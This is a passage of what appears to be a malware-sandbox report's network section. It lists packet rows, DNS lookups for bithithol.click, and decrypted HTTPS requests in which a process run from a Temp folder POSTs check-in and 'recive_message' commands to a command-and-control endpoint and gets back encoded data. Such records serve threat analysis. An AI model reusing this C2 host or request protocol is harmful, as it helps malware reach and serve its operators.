                                                                                                                Dec 24, 2024 13:52:49.977044106 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:49.977058887 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:51.213318110 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:51.213433981 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:51.214550972 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:51.214561939 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:51.214762926 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:51.215830088 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:51.215944052 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:51.215976954 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:51.216034889 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:51.216043949 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:52.498514891 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:52.498591900 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:52.498651028 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:52.498739004 CET49740443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:52.498759985 CET44349740104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:52.618175030 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:52.618269920 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:52.618376017 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:52.618650913 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:52.618685961 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:53.831594944 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:53.831695080 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:53.832901001 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:53.832933903 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:53.833149910 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:53.834274054 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:53.834355116 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:53.834367990 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:54.680293083 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:54.680362940 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:54.680449963 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:54.680579901 CET49741443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:54.680615902 CET44349741104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:55.072227955 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:55.072278023 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:55.072360039 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:55.072657108 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:55.072685957 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.288924932 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.289015055 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.290049076 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.290064096 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.290270090 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.291198015 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.291831017 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.291872978 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.291985989 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292021990 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292135954 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292232037 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292354107 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292375088 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292510033 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292538881 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292701006 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292730093 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292738914 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292754889 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292907953 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.292942047 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.292964935 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.293086052 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.293116093 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.335355043 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.335597992 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.335647106 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.335686922 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.379332066 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:56.379400969 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:56.423373938 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:59.543329954 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:59.543401957 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:59.543456078 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:59.543616056 CET49742443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:59.543636084 CET44349742104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:59.550806999 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:59.550894976 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:52:59.550972939 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:59.551244974 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:52:59.551297903 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:00.763854027 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:00.764065981 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:00.766534090 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:00.766556025 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:00.766771078 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:00.767891884 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:00.767932892 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:00.767970085 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:01.644635916 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:01.644705057 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:01.644762039 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:01.644994974 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:01.645009995 CET44349743104.21.33.227192.168.2.4
                                                                                                                Dec 24, 2024 13:53:01.645035028 CET49743443192.168.2.4104.21.33.227
                                                                                                                Dec 24, 2024 13:53:01.645042896 CET44349743104.21.33.227192.168.2.4

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 24, 2024 13:52:20.193665981 CET5824253192.168.2.41.1.1.1
                                                                                                                Dec 24, 2024 13:52:20.428658009 CET53582421.1.1.1192.168.2.4
                                                                                                                Dec 24, 2024 13:52:39.022186995 CET5329453192.168.2.41.1.1.1
                                                                                                                Dec 24, 2024 13:52:39.351145983 CET53532941.1.1.1192.168.2.4

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 24, 2024 13:52:20.193665981 CET192.168.2.41.1.1.10x33daStandard query (0)UJXheBevpnMncefcEO.UJXheBevpnMncefcEOA (IP address)IN (0x0001)false
                                                                                                                Dec 24, 2024 13:52:39.022186995 CET192.168.2.41.1.1.10xc76Standard query (0)bithithol.clickA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 24, 2024 13:52:20.428658009 CET1.1.1.1192.168.2.40x33daName error (3)UJXheBevpnMncefcEO.UJXheBevpnMncefcEOnonenoneA (IP address)IN (0x0001)false
                                                                                                                Dec 24, 2024 13:52:39.351145983 CET1.1.1.1192.168.2.40xc76No error (0)bithithol.click104.21.33.227A (IP address)IN (0x0001)false
                                                                                                                Dec 24, 2024 13:52:39.351145983 CET1.1.1.1192.168.2.40xc76No error (0)bithithol.click172.67.151.61A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • bithithol.click

                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449736104.21.33.2274437600C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-24 12:52:40 UTC262OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:40 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                2024-12-24 12:52:41 UTC1127INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:41 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=t3e33ebibv91ink60n6r33t7i8; expires=Sat, 19 Apr 2025 06:39:20 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=in2oZL3GclA8TGNF7VQFSe8%2FGBJbf4LPxZuR%2BeC5dZwm3rlOgwCOjMt7BT1MOB%2Fh4DP2tg4qo9HdMZ7Jrv6%2FJ5p1axLMF9%2BNC57ZNzrkpLNMCjoQSfpBok5ZG5L1nl8rk1E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70badb68e842cb-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2400&min_rtt=2400&rtt_var=1200&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4212&recv_bytes=906&delivery_rate=188776&cwnd=163&unsent_bytes=0&cid=5a1f8b3c7bfd3c29&ts=851&x=0"
                                                                                                                2024-12-24 12:52:41 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                Data Ascii: 2ok
                                                                                                                2024-12-24 12:52:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.449737104.21.33.2274437600C:\Users\user\AppData\Local\Temp\459250\Spa.com
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-24 12:52:42 UTC263OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 47
                                                                                                                Host: bithithol.click
                                                                                                                2024-12-24 12:52:42 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 76 51 4f 58 4e 2d 2d 64 6f 7a 70 31 26 6a 3d
                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=VvQOXN--dozp1&j=
                                                                                                                2024-12-24 12:52:43 UTC1130INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 24 Dec 2024 12:52:43 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=ovg7icb9fqbe568po63f3eoiqt; expires=Sat, 19 Apr 2025 06:39:22 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QIsC2ICO%2BQtG%2BxRPo2%2FR4q7fdBsDruzoqy10z88yFgvTiQt9PBNuZnkKonuTyEIBbW05zPufgo2%2BDsSha5bFitWFj%2FfKmUyhQesAoPP39cv3WxADBIqZsPSGTueLdKrLI4I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f70bae97f00428f-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=31753&min_rtt=14242&rtt_var=17217&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=946&delivery_rate=205027&cwnd=100&unsent_bytes=0&cid=ed86b8ce58d83524&ts=899&x=0"
                                                                                                                2024-12-24 12:52:43 UTC239INData Raw: 34 36 62 0d 0a 2f 64 63 6c 6d 33 63 6f 71 4e 5a 4b 30 54 61 6f 2b 52 6f 6c 62 31 39 34 43 51 4d 66 4b 36 32 78 33 31 39 71 45 62 69 51 2f 7a 75 47 39 56 4f 35 54 52 79 45 39 44 6d 30 46 4a 4b 4e 61 46 41 4b 63 31 70 6f 5a 7a 30 52 79 39 43 7a 4c 41 38 39 6d 75 61 53 47 63 65 78 52 50 63 45 54 59 54 30 4c 36 6b 55 6b 71 4a 68 42 77 6f 78 57 6a 4d 68 65 6b 48 50 30 4c 4d 39 43 33 72 58 34 4a 4e 59 6c 62 74 43 38 78 4a 4c 7a 4c 63 6d 76 46 50 4e 6e 48 74 50 41 54 59 56 59 57 34 39 42 34 2f 55 70 58 31 51 4d 2f 58 31 69 31 71 77 74 6c 62 77 56 56 57 45 72 57 69 30 57 49 72 44 4f 45 51 4b 50 52 52 76 5a 33 52 44 78 64 6d 37 50 41 35 37 79 50 6d 5a 55 35 57 31 51 66 49 59 51 74 69 36 4c 4c 74 59 79 35 5a 37 42 30
                                                                                                                Data Ascii: 46b/dclm3coqNZK0Tao+Rolb194CQMfK62x319qEbiQ/zuG9VO5TRyE9Dm0FJKNaFAKc1poZz0Ry9CzLA89muaSGcexRPcETYT0L6kUkqJhBwoxWjMhekHP0LM9C3rX4JNYlbtC8xJLzLcmvFPNnHtPATYVYW49B4/UpX1QM/X1i1qwtlbwVVWErWi0WIrDOEQKPRRvZ3RDxdm7PA57yPmZU5W1QfIYQti6LLtYy5Z7B0
                                                                                                                2024-12-24 12:52:43 UTC899INData Raw: 4e 39 48 58 4d 68 4a 51 6d 63 34 62 34 73 47 57 62 58 34 70 73 5a 67 50 74 65 75 52 4a 47 69 75 78 6f 75 31 6a 45 6e 6e 74 49 43 6a 77 61 65 57 35 39 53 73 66 62 75 54 63 48 66 4e 58 38 6c 31 36 58 76 45 44 32 45 6b 4c 4d 75 79 76 7a 47 6f 71 63 59 41 64 56 66 54 70 37 59 6e 35 64 77 73 4c 39 49 6b 5a 71 6d 76 57 52 47 63 66 31 51 66 63 55 52 38 71 6d 49 4c 68 66 7a 34 6c 7a 54 67 41 77 47 6d 5a 72 63 6b 72 50 31 4c 63 33 42 33 6e 65 2f 35 42 66 6e 37 55 48 74 31 56 4e 30 76 52 77 38 33 66 50 69 33 39 4c 47 33 38 67 4b 33 34 7a 55 49 2f 55 73 58 31 51 4d 39 4c 33 6e 6c 71 55 75 6b 54 78 48 6c 6a 4b 70 69 36 2b 55 64 69 64 66 55 6b 48 50 67 68 68 62 33 74 4b 78 74 69 30 4f 41 39 33 6d 72 7a 64 58 6f 66 31 48 37 6b 30 52 38 47 34 49 71 52 55 69 6f 51 32 58
                                                                                                                Data Ascii: N9HXMhJQmc4b4sGWbX4psZgPteuRJGiuxou1jEnntICjwaeW59SsfbuTcHfNX8l16XvED2EkLMuyvzGoqcYAdVfTp7Yn5dwsL9IkZqmvWRGcf1QfcUR8qmILhfz4lzTgAwGmZrckrP1Lc3B3ne/5Bfn7UHt1VN0vRw83fPi39LG38gK34zUI/UsX1QM9L3nlqUukTxHljKpi6+UdidfUkHPghhb3tKxti0OA93mrzdXof1H7k0R8G4IqRUioQ2X
                                                                                                                2024-12-24 12:52:43 UTC1369INData Raw: 34 34 62 31 0d 0a 7a 46 47 78 33 50 56 61 42 79 76 30 36 42 44 4f 43 73 70 4a 57 6b 4c 31 48 2b 42 46 48 7a 72 55 6c 76 31 33 4a 6c 33 52 50 41 44 45 65 5a 47 6c 31 53 73 66 42 73 7a 4d 4f 64 64 72 33 33 52 66 66 73 6c 2b 35 54 51 72 75 75 6a 2b 6e 58 34 69 75 65 30 6b 44 4f 67 77 72 66 6a 4e 51 6a 39 53 78 66 56 41 7a 31 50 2b 57 56 5a 69 38 52 76 6f 56 51 4d 53 37 49 72 74 63 79 70 5a 35 54 41 55 37 46 32 42 75 63 6b 37 48 30 4c 45 34 42 58 43 61 76 4e 31 65 68 2f 55 66 75 54 42 45 79 61 55 35 38 57 48 4a 6c 58 5a 41 47 33 30 46 4a 58 67 39 54 73 4f 54 35 58 30 43 64 4e 33 32 6b 46 4f 63 73 55 50 30 47 6b 50 44 76 54 71 35 57 4d 53 4a 64 55 30 49 4d 78 5a 75 62 6e 31 49 7a 74 32 33 4e 6b 67 39 6d 76 57 46 47 63 66 31 61 50 51 46 57 4d 43 2f 4f 66 46 68
                                                                                                                Data Ascii: 44b1zFGx3PVaByv06BDOCspJWkL1H+BFHzrUlv13Jl3RPADEeZGl1SsfBszMOddr33Rffsl+5TQruuj+nX4iue0kDOgwrfjNQj9SxfVAz1P+WVZi8RvoVQMS7IrtcypZ5TAU7F2Buck7H0LE4BXCavN1eh/UfuTBEyaU58WHJlXZAG30FJXg9TsOT5X0CdN32kFOcsUP0GkPDvTq5WMSJdU0IMxZubn1Izt23Nkg9mvWFGcf1aPQFWMC/OfFh
                                                                                                                2024-12-24 12:52:43 UTC1369INData Raw: 64 56 66 54 56 6f 64 33 63 4a 30 4a 32 6b 66 51 39 2f 6d 71 72 64 55 35 4f 78 52 50 55 63 52 73 65 31 4c 4c 52 5a 7a 70 74 2b 51 51 67 38 45 57 4e 74 63 6b 50 44 31 37 45 30 44 6e 2f 5a 38 5a 73 5a 30 66 56 41 34 56 55 53 69 70 55 6c 75 46 6a 4b 6d 47 6c 41 54 58 4e 61 5a 57 64 39 43 5a 66 46 72 53 6f 50 62 4a 54 72 33 56 36 54 39 52 2b 35 48 31 6a 50 75 69 79 35 55 63 36 58 63 6b 63 49 4c 78 4a 74 5a 6e 46 42 79 74 79 37 4f 41 56 30 30 66 47 50 53 35 79 78 53 66 56 56 42 49 71 7a 4d 50 4d 4d 69 72 35 76 52 42 30 37 47 53 74 2b 4d 31 43 50 31 4c 46 39 55 44 50 61 2f 4a 46 53 6d 4c 35 4d 2f 52 46 4b 78 37 38 6d 76 56 33 47 6b 33 52 41 48 7a 41 66 59 32 74 30 54 4d 50 65 76 69 38 4c 63 70 71 38 33 56 36 48 39 52 2b 35 4d 6e 6e 39 6c 32 69 73 47 74 50 62 66
                                                                                                                Data Ascii: dVfTVod3cJ0J2kfQ9/mqrdU5OxRPUcRse1LLRZzpt+QQg8EWNtckPD17E0Dn/Z8ZsZ0fVA4VUSipUluFjKmGlATXNaZWd9CZfFrSoPbJTr3V6T9R+5H1jPuiy5Uc6XckcILxJtZnFByty7OAV00fGPS5yxSfVVBIqzMPMMir5vRB07GSt+M1CP1LF9UDPa/JFSmL5M/RFKx78mvV3Gk3RAHzAfY2t0TMPevi8Lcpq83V6H9R+5Mnn9l2isGtPbf
                                                                                                                2024-12-24 12:52:43 UTC1369INData Raw: 61 52 32 4a 79 51 6f 2f 4d 38 79 52 49 64 4e 61 79 78 52 6d 59 76 55 2f 33 46 6b 7a 42 75 43 53 79 58 63 79 65 63 45 41 43 4f 68 4e 73 59 58 74 62 79 4e 36 30 50 51 4e 36 30 50 61 63 55 74 2f 37 42 2f 34 4e 43 70 4c 30 47 72 52 43 32 70 67 34 57 45 4d 6b 57 6d 78 74 50 52 47 50 33 71 38 38 44 57 48 65 2f 5a 5a 4c 6c 4c 4e 48 2f 41 64 4e 78 72 34 6e 73 46 7a 48 6d 48 42 56 44 54 41 61 65 58 4e 37 51 73 47 54 38 33 30 50 61 35 71 71 33 57 69 49 76 67 66 6d 57 31 4f 4b 73 79 54 7a 44 49 71 59 63 6b 6f 44 4c 78 35 74 61 6e 35 48 78 39 61 31 4f 51 4a 2b 31 66 6d 58 55 4a 65 31 53 50 77 64 51 63 79 36 4b 62 56 59 78 39 73 32 42 77 6f 6c 57 6a 4d 68 57 6c 50 43 31 61 6f 73 50 58 54 61 6f 39 31 47 30 61 77 48 2f 68 6b 4b 6b 76 51 6c 76 31 37 48 6e 6e 78 50 43 6a
                                                                                                                Data Ascii: aR2JyQo/M8yRIdNayxRmYvU/3FkzBuCSyXcyecEACOhNsYXtbyN60PQN60PacUt/7B/4NCpL0GrRC2pg4WEMkWmxtPRGP3q88DWHe/ZZLlLNH/AdNxr4nsFzHmHBVDTAaeXN7QsGT830Pa5qq3WiIvgfmW1OKsyTzDIqYckoDLx5tan5Hx9a1OQJ+1fmXUJe1SPwdQcy6KbVYx9s2BwolWjMhWlPC1aosPXTao91G0awH/hkKkvQlv17HnnxPCj
                                                                                                                2024-12-24 12:52:43 UTC1369INData Raw: 50 55 37 44 6b 2b 56 39 42 6e 37 63 38 35 78 52 6c 37 56 42 38 78 46 4a 77 37 63 76 75 6c 4c 42 6d 48 4a 49 43 6a 73 65 61 32 70 36 52 38 6e 57 74 6a 52 49 50 5a 72 31 68 52 6e 48 39 57 48 61 42 31 6a 34 75 69 75 6f 46 4e 58 56 59 51 63 4b 4d 56 6f 7a 49 58 5a 42 77 4d 47 34 4e 41 42 33 30 2f 4b 5a 55 35 4b 79 52 2f 77 59 54 38 36 36 4c 4c 52 55 78 70 52 2f 54 77 49 35 47 6d 51 68 4d 77 6e 49 79 2f 31 6c 53 46 50 52 35 4c 78 58 6c 4b 63 48 35 6c 74 54 69 72 4d 6b 38 77 79 4b 6c 58 46 47 42 54 4d 57 59 32 56 76 53 63 54 61 73 6a 77 48 63 39 6e 7a 6c 31 47 4e 73 30 66 79 48 55 33 43 73 43 61 68 56 63 58 62 4e 67 63 4b 4a 56 6f 7a 49 55 78 66 79 4e 53 79 66 79 46 30 77 66 4f 58 57 70 53 35 42 2b 5a 62 55 34 71 7a 4a 50 4d 4d 69 70 5a 30 53 67 6b 76 46 6d 74
                                                                                                                Data Ascii: PU7Dk+V9Bn7c85xRl7VB8xFJw7cvulLBmHJICjsea2p6R8nWtjRIPZr1hRnH9WHaB1j4uiuoFNXVYQcKMVozIXZBwMG4NAB30/KZU5KyR/wYT866LLRUxpR/TwI5GmQhMwnIy/1lSFPR5LxXlKcH5ltTirMk8wyKlXFGBTMWY2VvScTasjwHc9nzl1GNs0fyHU3CsCahVcXbNgcKJVozIUxfyNSyfyF0wfOXWpS5B+ZbU4qzJPMMipZ0SgkvFmt
                                                                                                                2024-12-24 12:52:43 UTC1369INData Raw: 35 4f 32 4d 77 31 79 31 76 69 61 56 34 32 30 54 66 55 55 54 63 32 2f 4f 72 68 47 77 5a 4e 37 53 51 55 30 47 6d 56 68 66 45 54 50 6b 2f 4e 39 44 32 75 61 71 74 31 38 76 4b 4a 52 38 31 64 70 33 61 49 69 74 46 6a 63 6b 48 6c 45 47 7a 41 4b 4b 79 38 39 57 4d 6a 43 2f 57 55 65 59 38 33 31 67 68 65 47 39 55 44 31 56 52 4b 4b 76 79 65 39 57 63 47 66 63 55 49 46 50 68 39 75 61 33 46 46 7a 74 75 30 4e 77 31 32 33 50 69 65 56 35 43 30 53 2f 30 63 52 4d 50 30 5a 76 4e 54 30 74 73 67 42 7a 73 74 48 58 4e 73 62 51 76 39 30 4b 77 73 48 58 37 4b 39 4e 39 32 6e 4c 6c 45 2f 42 4a 61 69 71 74 6d 71 68 54 4e 6c 7a 67 66 54 54 30 65 5a 32 4a 36 52 38 44 65 73 6a 6f 44 66 4e 44 38 6a 31 61 61 76 55 76 78 47 46 6a 41 76 6a 71 36 58 63 65 56 63 46 55 4f 66 56 51 72 5a 6d 55 4a
                                                                                                                Data Ascii: 5O2Mw1y1viaV420TfUUTc2/OrhGwZN7SQU0GmVhfETPk/N9D2uaqt18vKJR81dp3aIitFjckHlEGzAKKy89WMjC/WUeY831gheG9UD1VRKKvye9WcGfcUIFPh9ua3FFztu0Nw123PieV5C0S/0cRMP0ZvNT0tsgBzstHXNsbQv90KwsHX7K9N92nLlE/BJaiqtmqhTNlzgfTT0eZ2J6R8DesjoDfND8j1aavUvxGFjAvjq6XceVcFUOfVQrZmUJ
                                                                                                                2024-12-24 12:52:43 UTC1369INData Raw: 4e 4b 51 73 7a 2f 6a 56 71 61 73 6e 6e 48 47 30 33 65 73 79 61 31 56 49 72 56 4f 45 68 4e 5a 53 4d 72 4b 54 31 32 67 5a 4f 6c 66 56 41 7a 37 2f 47 54 56 35 69 6a 56 72 51 32 58 64 79 2b 4d 2f 46 79 7a 59 70 78 55 51 41 76 57 69 55 68 65 77 6d 58 67 2f 4e 39 44 47 4b 61 71 73 30 4c 78 4f 41 55 72 6b 55 59 31 66 6f 78 38 30 4b 4b 77 79 6f 4a 54 53 39 61 4d 79 45 36 53 74 33 42 75 7a 34 65 63 4a 33 4d 6f 33 6d 55 6f 30 62 30 48 6b 62 30 69 6a 32 77 57 73 53 63 62 6c 5a 4e 63 31 70 6b 49 53 56 77 6a 35 76 39 41 6b 59 7a 77 72 4c 46 47 61 71 32 53 66 63 53 58 4e 76 35 43 4c 68 43 79 35 5a 7a 53 30 38 38 46 33 74 6d 50 51 65 50 31 66 31 6c 57 44 32 61 39 6f 77 5a 78 2b 55 56 6f 6b 41 5a 6e 65 52 36 72 42 72 54 32 32 34 48 56 57 39 55 4b 33 4d 39 45 59 2b 55 76
